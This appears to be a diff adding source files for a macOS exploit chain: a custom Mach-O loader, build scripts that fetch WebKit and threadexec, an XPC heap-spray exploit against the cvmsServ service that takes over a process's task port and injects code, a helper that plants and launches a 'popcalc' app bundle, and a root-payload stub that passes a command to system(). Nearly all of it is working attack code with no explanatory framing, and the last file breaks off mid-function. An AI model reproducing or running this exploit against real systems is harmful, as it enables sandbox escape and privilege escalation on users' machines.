+                offset = ((segment_command_64 *)commands[segIndex])->vmaddr + segOffset - base;
+                printf("%llx (+%lx) %s %d\n", offset, segOffset, symbolName, type);
+                printf("dlsym(libs[%d] == %p, \"%s\") == %p\n", libIndex, libs[libIndex], symbolName + 1, res);
+                if(symbolName[0] == '_')
+                    *(void **)((char *)mem + offset) = res;
+                // if not, it's from dyld I guess
+                segOffset += 8;
+                if(opcode == BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED)
+                    segOffset += immediate * 8;
+                break;
+            }
+            default:
+                printf("WARNING: unsupported command: 0x%x\n", opcode);
+                // exit(-1);
+        }
+    }
+}
+
+inline void rebase_vm_(uint64_t base, void **libs, load_command **commands, void *map, uint8_t *cmd, size_t size) {
+    uint8_t *p = cmd, *end = cmd + size;
+    uint8_t  type = 0;
+    int      segIndex = 0;
+    uint64_t segOffset = 0;
+    uint64_t count;
+    uint64_t skip;
+    bool     segIndexSet = false;
+    bool     stop = false;
+    int ptrSize = 8;
+    while ( !stop && (p < end) ) {
+        uint8_t immediate = *p & REBASE_IMMEDIATE_MASK;
+        uint8_t opcode = *p & REBASE_OPCODE_MASK;
+        ++p;
+        switch (opcode) {
+            case REBASE_OPCODE_DONE:
+                if ( (end - p) > 8 )
+                    exit(100);
+                stop = true;
+                break;
+            case REBASE_OPCODE_SET_TYPE_IMM:
+                type = immediate;
+                break;
+            case REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
+                segIndex = immediate;
+                segOffset = read_uleb128(p, end);
+                segIndexSet = true;
+                break;
+            case REBASE_OPCODE_ADD_ADDR_ULEB:
+                segOffset += read_uleb128(p, end);
+                break;
+            case REBASE_OPCODE_ADD_ADDR_IMM_SCALED:
+                segOffset += immediate*ptrSize;
+                break;
+            case REBASE_OPCODE_DO_REBASE_IMM_TIMES:
+            case REBASE_OPCODE_DO_REBASE_ULEB_TIMES:
+                if(opcode == REBASE_OPCODE_DO_REBASE_IMM_TIMES)
+                    count = immediate;
+                else
+                    count = read_uleb128(p, end);
+                for (uint32_t i=0; i < count; ++i) {
+                    uintptr_t offset = ((segment_command_64 *)commands[segIndex])->vmaddr + segOffset - base;
+                    printf("rebase %lx (+%llx)\n", offset, segOffset);
+                    *(uintptr_t *)((uintptr_t)map + offset) += ((uintptr_t)map - base);
+                    segOffset += ptrSize;
+                }
+                break;
+            case REBASE_OPCODE_DO_REBASE_ADD_ADDR_ULEB: {
+                uintptr_t offset = ((segment_command_64 *)commands[segIndex])->vmaddr + segOffset - base;
+                printf("rebase %lx (+%llx)\n", offset, segOffset);
+                *(uintptr_t *)((uintptr_t)map + offset) += ((uintptr_t)map - base);
+                segOffset += read_uleb128(p, end) + ptrSize;
+                break;
+            }
+            case REBASE_OPCODE_DO_REBASE_ULEB_TIMES_SKIPPING_ULEB:
+                count = read_uleb128(p, end);
+                skip = read_uleb128(p, end);
+                for (uint32_t i=0; i < count; ++i) {
+                    uintptr_t offset = ((segment_command_64 *)commands[segIndex])->vmaddr + segOffset - base;
+                    printf("rebase %lx (+%llx)\n", offset, segOffset);
+                    *(uintptr_t *)((uintptr_t)map + offset) += ((uintptr_t)map - base);
+                    segOffset += skip + ptrSize;
+                    if ( stop )
+                        break;
+                }
+                break;
+            default:
+                exit(101);
+        }
+    }
+}
+
+#define vm(offset, size) vm_(base, libs, commands, map, (uint8_t *)mem + offset, size)
+#define rebase_vm(offset, size) rebase_vm_(base, libs, commands, map, (uint8_t *)mem + offset, size)
+
+extern "C" void load(void *mem, void *args) {
+    setvbuf(stdout, 0, _IONBF, 0);
+    mach_header *header = (mach_header *)mem;
+    load_command* startCmds = (load_command*)((char *)header + sizeof(mach_header_64));
+    load_command *cmd;
+
+    printf("%x %x\n", header->magic, MH_MAGIC_64);
+    size_t highest_address = 0;
+
+    load_command *commands[0x80];
+    void *libs[0x80 + 1];
+    int libCount = 1;
+    uint64_t base = 0;
+    char pagezero[] = "__PAGEZERO";
+
+#define LC cmd = startCmds; for (uint32_t i = 0; i < header->ncmds; ++i, cmd = (load_command*)((char *)cmd + cmd->cmdsize))
+
+    LC {
+        if(cmd->cmd != LC_SEGMENT_64) continue;
+        auto seg = (segment_command_64 *)cmd;
+        size_t end = seg->vmaddr + seg->vmsize;
+
+        if(!memcmp(seg->segname, (void *)pagezero, 11))
+            base = seg->vmsize;
+
+        if(highest_address < end) {
+            highest_address = end;
+        }
+
+        commands[i] = cmd;
+    }
+
+    highest_address -= base;
+    commands[header->ncmds] = 0;
+
+    printf("%lx\n", highest_address);
+    void *map = mmap(NULL, highest_address, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE|MAP_JIT, -1, 0);
+
+    uint64_t entry = 0;
+    dysymtab_command *symtab;
+
+    LC {
+        if(cmd->cmd == LC_SEGMENT_64) {
+            auto seg = (segment_command_64 *)cmd;
+            memcpy((char *)map + seg->vmaddr - base, (char *)mem + seg->fileoff, seg->filesize);
+        }
+
+        if(cmd->cmd == 0x80000028) {
+            auto entrycmd = (entry_point_command *)cmd;
+            entry = entrycmd->entryoff;
+        }
+
+        if(cmd->cmd == LC_SYMTAB) {
+            symtab = (dysymtab_command *)cmd;
+        }
+
+        if(cmd->cmd == LC_LOAD_DYLIB) {
+            auto dylib = (dylib_command *)cmd;
+            libs[libCount++] = dlopen_ptr((const char *)dylib + dylib->dylib.name.offset, RTLD_LAZY);
+        }
+    }
+
+    LC {
+        printf("cmd: %x\n", cmd->cmd);
+
+        if(cmd->cmd == LC_DYLD_INFO_ONLY) {
+            auto dyld = (dyld_info_command *)cmd;
+
+            rebase_vm(dyld->rebase_off, dyld->rebase_size);
+            vm(dyld->bind_off, dyld->bind_size);
+            vm(dyld->lazy_bind_off, dyld->lazy_bind_size);
+        }
+    }
+
+    if(!entry) {
+        for(size_t i = 0; i < highest_address; i++) {
+            int *cur = (int *)((char *)map + i);
+            if(cur[0] == 0x13371337) {
+                entry = i + 16;
+                printf("%lx %llx\n", i, entry);
+                break;
+            }
+        }
+    }
+
+    entry += (uint64_t)map;
+    printf("%p\n", (void *)entry);
+    ((void (*)(int, void *))(entry))(1, args);
+}
@@ -0,0 +1,8 @@
+#!/usr/bin/env python3
+
+import lief
+import sys
+
+p = lief.parse(sys.argv[1])
+loader = bytes(p.get_section('__text').content)
+open(sys.argv[2], 'wb').write(loader)
@@ -0,0 +1,8 @@
+/threadexec
+/WebKit
+
+/bundle.hh
+/sbx
+/sbx.dSYM
+/cvm_side
+
@@ -0,0 +1,37 @@
+# Copy flags from WebKit
+SBX_INCLUDES := -Ithreadexec/include \
+									-IWebKit/Source/WebCore/platform/network/cf \
+									-IWebKit/Source/WebCore/platform/network \
+									-IWebKit/Source/WTF \
+									-IWebKit/Source/WTF/icu
+
+SBX_WEBKIT_FLAGS := -fmessage-length=0 -fdiagnostics-show-note-include-stack -fmacro-backtrace-limit=0 -std=gnu++1z -stdlib=libc++ -Wno-trigraphs -fno-exceptions -fno-rtti -fno-sanitize=vptr -fpascal-strings -O3 -fno-common -Wno-missing-field-initializers -Wunreachable-code -Wnon-virtual-dtor -Wno-overloaded-virtual -Wno-exit-time-destructors -Wno-missing-braces -Wparentheses -Wswitch -Wunused-function -Wno-unused-label -Wno-unused-parameter -Wunused-value -Wempty-body -Wuninitialized -Wno-unknown-pragmas -Wno-shadow -Wno-four-char-constants -Wno-conversion -Wconstant-conversion -Wint-conversion -Wbool-conversion -Wenum-conversion -Wno-float-conversion -Wnon-literal-null-conversion -Wobjc-literal-conversion -Wsign-compare -Wno-shorten-64-to-32 -Wnewline-eof -Wno-c++11-extensions -DNDEBUG -DU_DISABLE_RENAMING=1 -DU_SHOW_CPLUSPLUS_API=0 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.15.sdk -fasm-blocks -fstrict-aliasing -Wdeprecated-declarations -Winvalid-offsetof -g -fvisibility=hidden -fvisibility-inlines-hidden -fno-threadsafe-statics -Wno-sign-conversion -Winfinite-recursion -Wmove -Wcomma -Wblock-capture-autoreleasing -Wstrict-prototypes -Wrange-loop-analysis -Wno-semicolon-before-method-body -isystem /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.15.sdk/usr/local/include
+
+SBX_CXXFLAGS = $(SBX_INCLUDES) $(SBX_WEBKIT_FLAGS) \
+							 -DCURRENT_DIR=\"$(CURDIR)\" \
+
+SBX_LDFLAGS = \
+							 -target x86_64-apple-macos10.15 \
+							 -framework JavaScriptCore \
+							 -framework CoreFoundation \
+							 -framework Foundation \
+							 -Lthreadexec/lib \
+							 -lthreadexec
+
+all: cvm_side sbx
+
+cvm_side: cvm_side.cc
+	make -C root
+	./embed.py root/app > bundle.hh
+	$(CXX) -o $@ $<
+
+sbx: safari.mm cvm.cc
+	./build-threadexec.sh
+	./build-webkit.sh
+	$(CXX) $(SBX_CXXFLAGS) -o $@ $^ $(SBX_LDFLAGS)
+
+clean:
+	make clean -C root
+	rm -f cvm_side sbx
+
+.PHONY: all clean
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+git clone https://github.com/bazad/threadexec.git
+cd threadexec
+git checkout 7c255d0a0d63464b82315d93a27dddc1d51b42d6
+patch -p1 --forward < ../threadexec.diff
+make
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+if [ ! -e WebKit ]; then
+    svn checkout -r 254377 --depth empty https://svn.webkit.org/repository/webkit/tags/Safari-608.5.11/Source/ WebKit/Source
+    cd WebKit/Source
+    svn update --set-depth empty WebCore WebCore/platform
+    svn update --set-depth infinity WebCore/platform/network WTF
+fi
+
@@ -0,0 +1,484 @@
+#include <sandbox.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <xpc/xpc.h>
+#include <time.h>
+#include <mach/mach.h>
+#include <mach/thread_status.h>
+#if __cplusplus
+extern "C" {
+#endif
+#include <threadexec/threadexec.h>
+#if __cplusplus
+}
+#endif
+#include <CommonCrypto/CommonDigest.h>
+#include <sys/stat.h>
+#include <mach-o/dyld.h>
+#include <dlfcn.h>
+#define _XOPEN_SOURCE
+#include <ucontext.h>
+
+#define PATHRAND 128
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+int sandbox_init_with_parameters(const char *profile,
+	uint64_t flags,
+	const char *const parameters[],
+	char **errorbuf);
+
+mach_port_t _xpc_dictionary_extract_mach_send(xpc_object_t, char const *);
+#ifdef __cplusplus
+}
+#endif
+
+#define TRIAL 0x1000
+#define PLUGIN_NAME "/System/Library/Frameworks/OpenGL.framework/Libraries/libGLVMPlugin.dylib"
+
+char prefix[0x100];
+char *tmpdir;
+
+char *conf(int id) {
+	char buf[0x400];
+	char buf2[0x400];
+	if(confstr(id, buf, sizeof(buf)) && realpath(buf, buf2)) {
+		printf("%d: %s\n", id, buf2);
+	} else {
+		puts("conf failed");
+		return NULL;
+	}
+	strcat(buf2, "/");
+	return strdup(buf2);
+}
+
+char data_exp[0x1000];
+int data_exp_size = sizeof(data_exp);
+struct {
+	uint64_t lib_size;
+	uint64_t bitcode_size;
+	uint64_t plugin_size;
+	uint8_t hash[32];
+	uint32_t revision;
+	uint32_t flags;
+	uint32_t count;
+	uint16_t loadable;
+	uint16_t bitcode_offset;
+	uint16_t plugin_offset;
+	uint16_t entry_offset;
+	char pad[4];
+	size_t pointers[0x12];
+} maps_exp_ = {
+	.lib_size=UINT64_MAX,
+	.bitcode_size=0,
+	.plugin_size=UINT64_MAX,
+	.hash={},
+	.revision=20120507,
+	.flags=0x31A,
+	.count=0,
+	.loadable=1,
+	.bitcode_offset=0,
+	.plugin_offset=0,
+	.entry_offset=0x30
+};
+char *maps_exp = (char *)&maps_exp_;
+long maps_exp_size = sizeof(maps_exp_);
+
+xpc_object_t mem_descriptor(void *mem, size_t size, size_t offset_in_page, size_t real_size, bool trigger) {
+	xpc_object_t elements[3] = {
+		xpc_shmem_create(mem, size),
+		xpc_uint64_create(offset_in_page),
+		xpc_uint64_create(real_size)
+	};
+
+	if(trigger) ((long *)elements[0])[4] = offset_in_page - 1;
+
+	return xpc_array_create(elements, 3);
+}
+
+const char *serviceName = "com.apple.cvmsServ";
+
+void my_error(const char *name) {
+	printf("error: %s\n", name);
+}
+
+xpc_connection_t connect(bool create) {
+	xpc_connection_t conn = xpc_connection_create_mach_service(serviceName, NULL, 0);
+	if (conn == NULL) {
+		my_error("xpc_connection_create_mach_service");
+		exit(1);
+	}
+
+	xpc_connection_set_event_handler(conn, ^(xpc_object_t) {
+		// printf("Received message in generic event handler: %p\n", obj);
+		// printf("%s\n", xpc_copy_description(obj));
+	});
+
+	xpc_connection_resume(conn);
+
+	if(create) {
+		xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
+		xpc_dictionary_set_int64(msg, "message", 1);
+		xpc_connection_send_message(conn, msg);
+		// usleep(20000);
+	}
+
+	return conn;
+}
+
+char *pad(int size, int i) {
+	static char value[0x10000];
+	// char *value = (char *)mmap(NULL, ((size + 1) + 0xfff) & ~0xfff, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
+	int start = sprintf(value, "0x%x", i);
+	memset(value + start, 0x41, size);
+	value[size] = '\0';
+	return value;
+}
+
+void spray_value(xpc_object_t msg) {
+	xpc_dictionary_set_value(msg, "ey", xpc_fd_create(0));
+
+	if(true) {
+		// prepare *neighboring* chunks which fills the freelist
+		xpc_object_t subdict = xpc_dictionary_create(NULL, NULL, 0);
+		for(int i = 0; i < 0x500; i++) {
+			xpc_dictionary_set_value(subdict, pad(0x50 - 41, i), xpc_bool_create(true));
+		}
+		xpc_dictionary_set_value(msg, "free", subdict);
+	}
+
+	// lets spoof deserializer to free the first "free" key
+	xpc_dictionary_set_value(msg, "fref", xpc_bool_create(true));
+	static bool seen_free = false;
+	xpc_dictionary_apply(msg, ^bool(const char *key, xpc_object_t) {
+		if(!strcmp(key, "free")) {
+			seen_free = true;
+		}
+		if(!memcmp(key, "fre", 3) && key[3] != 'e') {
+			if(!seen_free) {
+				puts("check other key!");
+				exit(1);
+			}
+			memcpy((void *)key, "free", 4);
+		}
+		return true;
+	});
+}
+
+xpc_object_t init_msg;
+
+xpc_connection_t spray() {
+	xpc_connection_t conn = connect(false);
+	xpc_object_t msg;
+
+	msg = xpc_dictionary_create(NULL, NULL, 0);
+	xpc_dictionary_set_int64(msg, "message", 1);
+	spray_value(msg);
+
+	xpc_connection_send_message(conn, msg);
+	// usleep(20000);
+
+	xpc_dictionary_set_int64(msg, "message", 4);
+	char buf[0x1000];
+	strcpy(buf, "../../../../");
+	strcat(buf, tmpdir);
+	for(int i = 0; i < PATHRAND; i++)
+		strcat(buf, (rand() % 2) ? "./" : "//");
+	strcat(buf, "spray");
+	strcat(buf, prefix);
+	xpc_dictionary_set_string(init_msg, "framework_name", buf);
+	xpc_connection_send_message_with_reply(conn, init_msg, NULL, ^(xpc_object_t) {
+		puts("spraying...");
+	});
+	// xpc_release(conn);
+
+	return conn;
+}
+
+uint64_t heap_index;
+
+vm_address_t allocate(mach_port_t port, size_t size, void **map) {
+	vm_prot_t PROTECTION = VM_PROT_READ | VM_PROT_WRITE;
+	vm_address_t address = 0;
+	if(vm_allocate(port, &address, size, true)) {
+		my_error("vm_allocate");
+		exit(1);
+	}
+	if(map) {
+		mach_port_t handle;
+		if(mach_make_memory_entry_64(port, (memory_object_size_t *)&size, address, PROTECTION | 0x400000, &handle, 0)) {
+			my_error("mach_make_memory_entry_64");
+			exit(1);
+		}
+		if(vm_map(mach_task_self(), (vm_address_t *)map, size, 0, 1, handle, 0, false, PROTECTION, PROTECTION, VM_INHERIT_NONE)) {
+			my_error("vm_map");
+			exit(1);
+		}
+	}
+	return address;
+}
+
+bool vm_read_chk(vm_map_t target_task, size_t address, void *data, vm_size_t size) {
+	mach_msg_type_number_t outCnt;
+	memset(data, 0, size);
+	vm_address_t dataPtr;
+	if(vm_read(target_task, address, size, &dataPtr, &outCnt)) {
+		puts("error: vm_read");
+		return false;
+	}
+	// printf("vm_read(%p, 0x%x): 0x%x\n", address, size, outCnt);
+	memcpy(data, (void *)dataPtr, outCnt);
+	vm_deallocate(mach_task_self(), dataPtr, outCnt);
+	return true;
+}
+
+__asm__(".data\n_loader_start: .incbin \"" CURRENT_DIR "/../loader/loader.bin\"\n_loader_end:");
+__asm__(".data\n_library_start: .incbin \"" CURRENT_DIR "/../sbx/cvm_side\"\n_library_end:");
+
+extern char loader_start[], loader_end[];
+extern char library_start[], library_end[];
+
+void spoof(mach_port_t port) {
+	thread_act_array_t threads;
+	mach_msg_type_number_t count;
+	task_threads(port, &threads, &count);
+	printf("threads: %d\n", count);
+	static bool first = true;
+
+	threadexec_t tx = threadexec_init(port, threads[1], TX_BORROW_THREAD_PORT | (first ? TX_SUSPEND : 0));
+	puts("yey");
+
+	size_t res = -1, res2 = -1;
+	threadexec_call_cv(tx, &res, sizeof(res), (void *)&mmap,
+		6,
+		TX_CARG_LITERAL(uint64_t, 0),
+		TX_CARG_LITERAL(uint64_t, (0x1000 + library_end - library_start)),
+		TX_CARG_LITERAL(uint64_t, 7),
+		TX_CARG_LITERAL(uint64_t, MAP_JIT | MAP_ANON | MAP_PRIVATE),
+		TX_CARG_LITERAL(uint64_t, -1),
+		TX_CARG_LITERAL(uint64_t, 0)
+		);
+
+	printf("0x%lx\n", res);
+	printf("%p %p\n", dlopen, dlsym);
+
+	vm_write(port, res, (vm_offset_t)loader_start, loader_end - loader_start);
+	vm_write(port, res + 0x1000, (vm_offset_t)library_start, library_end - library_start);
+
+	first = false;
+
+	/* payload/loader/loader.bin:
+            0x00000055      e801000000     call 0x5b
+            0x0000005a      c3             ret
+						*/
+	size_t entry_call_offset = 0x5b;
+	threadexec_call_cv(tx, &res2, sizeof(res), (void *)(res + entry_call_offset),
+		4,
+		TX_CARG_LITERAL(uint64_t, (res + 0x1000)),
+		TX_CARG_LITERAL(uint64_t, dlopen),
+		TX_CARG_LITERAL(uint64_t, dlsym),
+		TX_CARG_LITERAL(uint64_t, NULL)
+	);
+
+	puts("done!");
+}
+
+bool
+trigger()
+{
+	// xpc_connection_t spray_conn = spray();
+	xpc_connection_t conn = connect(true);
+	xpc_object_t msg;
+
+	char buf[0x1000];
+	strcpy(buf, "../../../../");
+	strcat(buf, tmpdir);
+	for(int i = 0; i < PATHRAND; i++)
+		strcat(buf, (rand() % 2) ? "./" : "//");
+	strcat(buf, "exp");
+	strcat(buf, prefix);
+	xpc_dictionary_set_string(init_msg, "framework_name", buf);
+
+#define COUNT 1
+	for(int i = 0; i < COUNT; i++) {
+		xpc_connection_send_message_with_reply(conn, init_msg, NULL, ^(xpc_object_t resp) {
+			printf("Received second message: %p\n%s\n", resp, xpc_copy_description(resp));
+		});
+
+		msg = xpc_dictionary_create(NULL, NULL, 0);
+		xpc_dictionary_set_int64(msg, "message", 7);
+		xpc_dictionary_set_uint64(msg, "heap_index", heap_index);
+
+		xpc_object_t resp = xpc_connection_send_message_with_reply_sync(conn, msg);
+
+		{
+			static int count = 0;
+			count++;
+			int pid = 0;
+			mach_port_t port = _xpc_dictionary_extract_mach_send((xpc_connection_t)resp, "vm_port");
+			printf("Received second message: %p\n%s\n", resp, xpc_copy_description(resp));
+
+			if(port) {
+				int res = pid_for_task(port, &pid);
+				printf("try: %d %d %d\n", port, res, pid);
+				if(!res) {
+					puts("success!");
+					spoof(port);
+					return true;
+				}
+			}
+
+			if(xpc_get_type(resp) == &_xpc_type_error) {
+				// exit(0);
+			}
+		}
+	}
+
+	return false;
+}
+
+void write_file(const char *buf, void *data, size_t size) {
+	int fd = open(buf, O_CREAT|O_WRONLY, 0777);
+	if(fd == -1) {
+		my_error("open");
+		exit(1);
+	}
+	write(fd, data, size);
+	close(fd);
+}
+
+void *cvm_main(void *) {
+	struct stat statbuf;
+
+	tmpdir = conf(0x10001);
+	if(stat("/System/Library/Frameworks/OpenGL.framework/Libraries/libLLVMContainer.dylib", &statbuf)) {
+		my_error("stat");
+		return NULL;
+	}
+	maps_exp_.lib_size = statbuf.st_size;
+
+	if(stat(PLUGIN_NAME, &statbuf)) {
+		my_error("stat");
+		return NULL;
+	}
+	maps_exp_.plugin_size = statbuf.st_size;
+
+	CC_SHA256(data_exp, sizeof(data_exp), maps_exp_.hash);
+
+	setvbuf(stdout, 0, _IONBF, 0);
+	sprintf(prefix, "%lX", clock());
+
+	char logpath[0x100];
+	sprintf(logpath, "%s/%s", tmpdir, "log.txt");
+	unlink(logpath);
+
+	close(0);
+	close(1);
+	close(2);
+	int fd = open(logpath, O_CREAT|O_WRONLY, 0777);
+	for(int i = 0; i < 3; i++)
+		dup(fd);
+
+	char buf[0x400];
+	int id = geteuid();
+
+#define WRITE(type) \
+	snprintf(buf, sizeof(buf), "%s/%s%s.x86_64.%d.data", tmpdir, #type, prefix, id); \
+	write_file(buf, data_##type, data_##type##_size); \
+	snprintf(buf, sizeof(buf), "%s/%s%s.x86_64.%d.maps", tmpdir, #type, prefix, id); \
+	write_file(buf, maps_##type, maps_##type##_size);
+
+	{
+		size_t offsets[] = {
+			// 0x3b
+		};
+
+		uint32_t *addr = &mach_task_self_;
+		while(true) {
+			if(*addr == 0x103) {
+				break;
+			}
+			addr++;
+		}
+
+		for(int i = 0; i < sizeof(offsets) / sizeof(offsets[0]); i++) {
+			uint32_t **base = (uint32_t **)(maps_exp + 0x50 + offsets[i] * 8);
+			*base = addr;
+		}
+	}
+
+	{
+		size_t offsets[] = {
+			0xf, 0x11
+		};
+
+		// Just peek any library area that contains "0x103" dword in 8-byte aligned storage
+		extern size_t NSOwnedPointerHashCallBacks;
+		size_t *addr = &NSOwnedPointerHashCallBacks;
+		while(true) {
+			if(*addr == 0x103) {
+				break;
+			}
+			addr++;
+		}
+
+		/*
+		GetMemory(index)
+			rax := UserInput
+			[rax+0x38] = X
+			[X+0x30] = Length (UINT64_MAX)
+			[X+0x28] = Y (0)
+			[Y+0x18*index+0x10] = 0x103 (== mach_task_self_)
+		*/
+		size_t *target_addr = (size_t *)(((size_t *)&_xpc_error_termination_imminent)[4] + 0x10 - 0x38);
+		extern int num_frames;
+		heap_index = (0xaaaaaaaaaaaaaabLL * (
+			((size_t)addr - 0x10 -
+			((size_t *)target_addr[0x38 >> 3])[0x28 >> 3])
+			>> 3
+		) % (1LL << 61));
+		// index * 0x18 = (0x00007FFF9963CFB8 - 0x00007FFF9978EB68)
+		printf("0x%llX\n", heap_index);
+
+		for(unsigned long i = 0; i < sizeof(offsets) / sizeof(offsets[0]); i++) {
+			size_t **base = (size_t **)(maps_exp + 0x50 + offsets[i] * 8);
+			*base = target_addr;
+		}
+	}
+
+	WRITE(exp);
+
+	srand(time(NULL));
+
+	init_msg = xpc_dictionary_create(NULL, NULL, 0);
+	xpc_dictionary_set_int64(init_msg, "message", 4);
+	struct {
+		uint64_t size;
+		int arch;
+		int flags;
+	} _id = {
+		0xFFFFFFFFFFF0000, 0x2, *(short *)&maps_exp[0x3c]
+	};
+	xpc_dictionary_set_value(init_msg, "args", xpc_data_create(&_id, 16));
+	spray_value(init_msg);
+	xpc_dictionary_set_string(init_msg, "bitcode_name", "");
+	xpc_dictionary_set_string(init_msg, "plugin_name", PLUGIN_NAME);
+
+	for(int i = 0; i < TRIAL; i++) {
+		for(int i = 0; i < 8; i++) {
+			spray();
+		}
+
+		if(trigger())
+			break;
+		usleep(200000);
+	}
+	// for(int i = 0; i < TRIAL; i++) {
+	// 	xpc_release(conn[i]);
+	// }
+	return NULL;
+}
@@ -0,0 +1,124 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <signal.h>
+#include <sys/sysctl.h>
+
+char* get_arg0_of_pid(int pid) {
+  int mib[3];
+  mib[0] = CTL_KERN;
+  mib[1] = KERN_ARGMAX;
+  mib[2] = 0;
+
+  int argmax = 0;;
+  size_t size = sizeof(argmax);
+  if (sysctl(mib, 2, &argmax, &size, NULL, 0) == -1) {
+    return 0;
+  }
+
+  char* procargs = (char *)malloc(argmax);
+  if (procargs == NULL) {
+    return 0;
+  }
+
+  mib[0] = CTL_KERN;
+  mib[1] = KERN_PROCARGS2;
+  mib[2] = pid;
+
+  size = (size_t)argmax;
+  if (sysctl(mib, 3, procargs, &size, NULL, 0) == -1) {
+    free(procargs);
+    return 0;
+  }
+
+  char* returnarg0 = strdup(procargs + sizeof(int));
+  free(procargs);
+  return returnarg0;
+}
+
+int find_first_pid_matching(char* starting_arg) {
+  size_t start_len = strlen(starting_arg);
+  if (start_len < 1) {
+    return 0;
+  }
+  for (int i=0;i<65536;i++) {
+    char* arg0 = get_arg0_of_pid(i);
+    if (arg0) {
+      if (!strncmp(arg0, starting_arg, start_len)) {
+        int pid = i;
+        free(arg0);
+        return pid;
+      } else {
+        free(arg0);
+      }
+    }
+  }
+  return 0;
+}
+
+char randbuf[0x1000] = "";
+
+void *handler(void *arg) {
+  char cvms_app_path[] = "/private/var/db/CVMS/";
+  while (true) {
+    int app_pid = find_first_pid_matching(cvms_app_path);
+    if (app_pid) {
+      kill(app_pid, SIGCONT);
+      break;
+    }
+    sleep(1);
+  }
+
+  char coreserv_path[] = "/System/Library/CoreServices/CoreServicesUIAgent.app/Contents/MacOS/CoreServicesUIAgent";
+  int popup_pid = find_first_pid_matching(coreserv_path);
+  if (popup_pid) {
+    kill(popup_pid, SIGKILL);
+  }
+
+  sleep(1);
+
+  unlink("/private/var/db/CVMS/m.app/Contents/PkgInfo");
+  unlink("/private/var/db/CVMS/m.app/Contents/Info.plist");
+  unlink("/private/var/db/CVMS/m.app/Contents/MacOS/popcalc");
+  rmdir("/private/var/db/CVMS/m.app/Contents/MacOS");
+  rmdir("/private/var/db/CVMS/m.app/Contents/Resources");
+  rmdir("/private/var/db/CVMS/m.app/Contents");
+  unlink("/private/var/db/CVMS/m.app");
+  rmdir(randbuf);
+
+  return 0;
+}
+
+void write_file(const char *path, const void *ptr, size_t size) {
+  int fd = open(path, O_CREAT | O_WRONLY, 0777);
+  write(fd, ptr, size);
+  close(fd);
+}
+
+void init_app() {
+  sprintf(randbuf, "/private/var/db/CVMS/");
+
+  chdir(randbuf);
+  unlink("m.app");
+
+  sprintf(randbuf, "%lu.app", clock());
+  symlink(randbuf, "m.app");
+
+  mkdir(randbuf, 0777);
+  chdir(randbuf);
+
+#include "bundle.hh"
+
+  chdir("/private/var/db/CVMS");
+}
+
+int main() {
+  init_app();
+
+  pthread_t thread;
+  pthread_create(&thread, NULL, handler, NULL);
+}
@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+
+import os, sys
+
+os.chdir(sys.argv[1])
+
+def recursive(path):
+	base = path
+	for path in os.listdir(path):
+		abspath = os.path.join(base, path).replace('\\', '/')
+		sys.stderr.write('Packing ' + abspath+'\n')
+		if os.path.isdir(abspath):
+			print("mkdir(\"%s\", 0777);" % abspath)
+			recursive(abspath)
+		else:
+			print("{")
+			print("  unsigned char content[] = {%s};" % ((', '.join('%d' % x for x in open(abspath, "rb").read()))))
+			print("  write_file(\"%s\", content, sizeof(content));" % abspath)
+			print("}")
+
+recursive('.')
@@ -0,0 +1,2 @@
+/Unrootless-Kext
+/Unrootless
@@ -0,0 +1,12 @@
+CFLAGS := -DCURRENT_DIR=\"$(CURDIR)\"
+TARGET := app/Contents/MacOS/popcalc
+
+all: $(TARGET)
+
+$(TARGET): main.c
+	$(CC) $(CFLAGS) -o $@ $^
+
+clean:
+	rm -f $(TARGET)
+
+.PHONY: all clean
@@ -0,0 +1,52 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>BuildMachineOSBuild</key>
+	<string>19D76</string>
+	<key>CFBundleDevelopmentRegion</key>
+	<string>en</string>
+	<key>CFBundleExecutable</key>
+	<string>popcalc</string>
+	<key>CFBundleIdentifier</key>
+	<string>nogroup.popcalc</string>
+	<key>CFBundleInfoDictionaryVersion</key>
+	<string>6.0</string>
+	<key>CFBundleName</key>
+	<string>popcalc</string>
+	<key>CFBundlePackageType</key>
+	<string>APPL</string>
+	<key>CFBundleShortVersionString</key>
+	<string>1.0</string>
+	<key>CFBundleSupportedPlatforms</key>
+	<array>
+		<string>MacOSX</string>
+	</array>
+	<key>CFBundleVersion</key>
+	<string>1</string>
+	<key>DTCompiler</key>
+	<string>com.apple.compilers.llvm.clang.1_0</string>
+	<key>DTPlatformBuild</key>
+	<string>11C504</string>
+	<key>DTPlatformVersion</key>
+	<string>GM</string>
+	<key>DTSDKBuild</key>
+	<string>19B90</string>
+	<key>DTSDKName</key>
+	<string>macosx10.15</string>
+	<key>DTXcode</key>
+	<string>1130</string>
+	<key>DTXcodeBuild</key>
+	<string>11C504</string>
+	<key>LSMinimumSystemVersion</key>
+	<string>10.15</string>
+	<key>NSHumanReadableCopyright</key>
+	<string>Copyright © 2020 setuid0. All rights reserved.</string>
+	<key>NSPrincipalClass</key>
+	<string>NSApplication</string>
+	<key>NSSupportsAutomaticTermination</key>
+	<true/>
+	<key>NSSupportsSuddenTermination</key>
+	<true/>
+</dict>
+</plist>
@@ -0,0 +1 @@
+APPL????
@@ -0,0 +1,34 @@
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+
+char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";
+void run_payload() {
+  if (!strncmp(root_payload, "CMD:", 4)) {
+    system(root_payload + 4);
+  } else {
